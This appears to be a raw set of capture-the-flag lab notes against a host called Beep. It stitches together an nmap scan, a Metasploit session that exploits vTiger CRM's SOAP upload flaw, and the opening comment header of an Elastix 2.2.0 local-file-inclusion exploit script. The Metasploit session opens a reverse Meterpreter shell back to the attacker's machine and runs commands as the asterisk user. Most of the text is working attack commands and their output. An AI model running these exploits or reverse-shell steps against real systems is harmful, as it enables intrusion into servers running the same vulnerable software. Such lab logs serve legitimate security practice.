# Nmap 7.80 scan initiated Tue Apr 7 03:18:33 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.25s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) STLS RESP-CODES AUTH-RESP-CODE USER EXPIRE(NEVER) PIPELINING
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES ATOMIC Completed MAILBOX-REFERRALS OK RENAME LISTEXT LITERAL+ MULTIAPPEND X-NETSCAPE LIST-SUBSCRIBED CHILDREN UNSELECT RIGHTS=kxte URLAUTHA0001 IDLE IMAP4rev1 SORT=MODSEQ ID BINARY IMAP4 CONDSTORE CATENATE SORT ANNOTATEMORE NO UIDPLUS STARTTLS ACL NAMESPACE THREAD=ORDEREDSUBJECT QUOTA
443/tcp   open  ssl/https?
|_ssl-date: 2020-04-07T07:23:36+00:00; +1m25s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 7 03:24:47 2020 -- 1 IP address (1 host up) scanned in 374.24 seconds
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /vtigercrm/      yes       Base vTiger CRM directory path
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   vTigerCRM v5.4.0
msf5 exploit(multi/http/vtiger_soap_upload) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf5 exploit(multi/http/vtiger_soap_upload) > set RPORT 443
RPORT => 443
msf5 exploit(multi/http/vtiger_soap_upload) > set SSL true
SSL => true
msf5 exploit(multi/http/vtiger_soap_upload) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf5 exploit(multi/http/vtiger_soap_upload) > check
[+] 10.10.10.7:443 - The target is vulnerable.
msf5 exploit(multi/http/vtiger_soap_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (38288 bytes) to 10.10.10.7
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.7:43989) at 2020-04-07 10:50:50 -0400
[!] This exploit may require manual cleanup of 'bPRojImibS.php' on the target

meterpreter > [+] Deleted bPRojImibS.php
shell
Process 8916 created.
Channel 0 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
#!/usr/bin/perl -w
#------------------------------------------------------------------------------------
#Elastix is an Open Source Software to establish Unified Communications.
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version: Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/